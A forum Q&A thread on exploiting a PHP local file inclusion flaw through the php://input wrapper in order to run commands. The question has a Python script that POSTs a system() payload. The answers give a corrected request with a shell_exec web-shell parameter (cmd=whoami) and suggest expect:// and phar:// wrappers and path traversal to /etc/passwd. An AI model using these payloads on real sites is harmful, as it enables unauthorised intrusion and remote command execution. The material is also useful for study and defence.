LFI php://input returning initial argument?

Question

TLDR: Trying to execute commands on site thats got a LFI vuln.

So I am making my post request to my vulnerable site and

import requests
header = {
            'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201',
            'Accept-Language':'en-US;',
            'Accept-Encoding': 'gzip, deflate',
            'Accept': 'text/html,application/xhtml+xml,application/xml;',
            'Connection':'close'
}

command = "<? system(\"echo does this work\");?>"
requests.post("https://www.vulnsite.com/pog=php://input", headers=header, data=command)

then if i look at the actual response it returns: <? system("echo does this work");?>

why isn't it returning "does this work"? how can I get it to execute actual commands? what am I doing wrong?

A Local File Injection vuln is not a Command Injection vuln ! — Soufiane Tahiri, Jan 18 '21 at 08:55
Looks like the stream is being read, not run via an `include — wireghoul, Jul 20 '21 at 06:42

score 0 · Answer 1 · answered Jan 17 '21 at 11:56

0

Maybe the your syntax isn't correct inside the system function, and the error output isn't printed. Try your request in the web browser buy using the source mode view with CTR+U.

Inside the system function should be called like this:

<?php system(\"echo 'does this work'\");?>

answered Jan 17 '21 at 11:56

kikos897

1
2

Tried that before doesn't work :/ also played around with different modifications of this. thanks tho – RFIx Jan 18 '21 at 05:04

score 0 · Answer 2 · answered Feb 18 '21 at 20:34

There is a problem the way you crafted the request using php wrapper, it should be, requests.post("https://www.vulnsite.com**?pog=php:**//input", headers=header, data=command) Note that you are using POST request to send the data to the server, so you should have way access that data, the complete request should be like this,

command = <?php echo shell_exec($_GET['cmd']); ?>

requests.post("https://www.vulnsite.com?pog=php://input&cmd=whoami", headers=header, data=command)

Also, I would recommend you should intercept the request while sending using proxy tools like burp or of your choice.

score 0 · Answer 3 · answered Feb 19 '21 at 14:46

Not every LFI is automatically RCE - it depends on the specific target. Did you already verify that you got RCE (for example using Burp or so)?

If so, you may also need to invoke your code after inserting it. I would try calling the URL to the injected script via browser or code and look at the result of this request.

score 0 · Answer 4 · answered Jul 20 '21 at 06:47

It appears that the stream (php://input) is being read via some file operation like file_get_contents(), not run via an include() or require() function which would evaluate the code. Hence you are seeing the code being reflected back, as opposed to the output of executed code.

You might be able to leverage a different stream handler like expect:// or phar:// to achieve code execution. Additionally the code which reads php://input is likely to allow traversal when reading files so you can probably read other files like ../../../../../../../etc/passwd or the php files on the server which may allow you to identify additional vulnerabilities such as SQL injection.

LFI php://input returning initial argument?

4 Answers4